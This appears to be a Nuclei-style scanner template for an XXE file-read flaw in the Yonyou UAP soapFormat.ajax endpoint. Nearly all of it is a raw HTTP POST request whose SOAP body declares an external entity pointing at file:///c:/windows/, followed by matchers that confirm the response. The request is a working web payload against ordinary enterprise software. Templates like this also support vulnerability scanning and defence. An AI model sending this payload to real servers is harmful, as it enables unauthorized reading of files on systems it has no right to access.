id: yongyou_soapFormat_xxe

info:
  name: 用友soapFormat xxe文件读取
  author: Str1am
  severity: high
  tags: yongyou,xxe

requests:
  - raw:
      - |
        POST /uapws/soapFormat.ajax HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 261
        Connection: close
        Upgrade-Insecure-Requests: 1

        msg=<!DOCTYPE foo[<!ENTITY xxe SYSTEM "file:///c:/windows/"> ]>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/%22%3E
        <soap:Body>
        <soap:Fault>
        <faultcode>soap:Server%26xxe%3b</faultcode>
        </soap:Fault>
        </soap:Body>
        </soap:Envelope>%0a

        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "soap:Envelope"
          - "faultcode"
        part: body
        condition: and